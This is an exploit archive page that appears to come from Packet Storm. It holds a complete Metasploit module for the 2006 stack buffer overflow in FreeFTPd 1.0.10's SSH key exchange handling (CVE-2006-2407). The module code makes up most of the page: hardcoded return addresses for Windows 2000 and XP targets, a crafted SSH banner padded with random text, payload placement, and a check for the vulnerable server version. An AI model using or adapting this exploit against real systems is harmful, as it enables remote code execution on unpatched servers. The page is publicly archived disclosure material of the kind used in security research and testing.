exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

FreeFTPd 1.0.10 Key Exchange Algorithm String Buffer Overflow

FreeFTPd 1.0.10 Key Exchange Algorithm String Buffer Overflow
Posted Nov 26, 2009
Authored by riaf | Site metasploit.com

This Metasploit module exploits a simple stack overflow in FreeFTPd 1.0.10. This flaw is due to a buffer overflow error when handling a specially crafted key exchange algorithm string received from an SSH client. This Metasploit module is based on MC's freesshd_key_exchange exploit.

tags | exploit, overflow
advisories | CVE-2006-2407
SHA-256 | 7edeab39559b786875c2e25515c39c1c952e00229cbdac9c0aa83bf02ea93c48

FreeFTPd 1.0.10 Key Exchange Algorithm String Buffer Overflow

Change Mirror Download
##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

include Msf::Exploit::Remote::Tcp

def initialize(info = {})
super(update_info(info,
'Name' => 'FreeFTPd 1.0.10 Key Exchange Algorithm String Buffer Overflow',
'Description' => %q{
This module exploits a simple stack overflow in FreeFTPd 1.0.10
This flaw is due to a buffer overflow error when handling a specially
crafted key exchange algorithm string received from an SSH client.
This module is based on MC's freesshd_key_exchange exploit.
},
'Author' => 'riaf [at] mysec.org',
'License' => BSD_LICENSE,
'Version' => '$Revision$',
'References' =>
[
['CVE', '2006-2407'],
['OSVDB', '25569'],
['BID', '17958'],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 500,
'BadChars' => "\x00",
'StackAdjustment' => -3500,
},
'Platform' => 'win',

'Targets' =>
[
[ 'Windows 2000 SP0-SP4 English', { 'Ret' => 0x750231e2 } ],
[ 'Windows 2000 SP0-SP4 German', { 'Ret' => 0x74f931e2 } ],
[ 'Windows XP SP0-SP1 English', { 'Ret' => 0x71ab1d54 } ],
[ 'Windows XP SP2 English', { 'Ret' => 0x71ab9372 } ],
],

'Privileged' => true,

'DisclosureDate' => 'May 12 2006',

'DefaultTarget' => 0))

register_options( [ Opt::RPORT(22) ], self.class)

end

def exploit
connect

sploit = "SSH-2.0-OpenSSH_3.9p1"
sploit << "\x0a\x00\x00\x4f\x04\x05\x14\x00\x00\x00\x00\x00\x00\x00"
sploit << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\xde"
sploit << rand_text_alphanumeric(1055) + [target.ret].pack('V')
sploit << payload.encoded + rand_text_alphanumeric(19000) + "\r\n"

res = sock.recv(40)
if ( res =~ /SSH-2\.0-WeOnlyDo-wodFTPD 2\.1\.8\.98/)
print_status("Trying target #{target.name}...")
sock.put(sploit)
else
print_status("Not running a vulnerable version...")
end

handler
disconnect

end
end
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close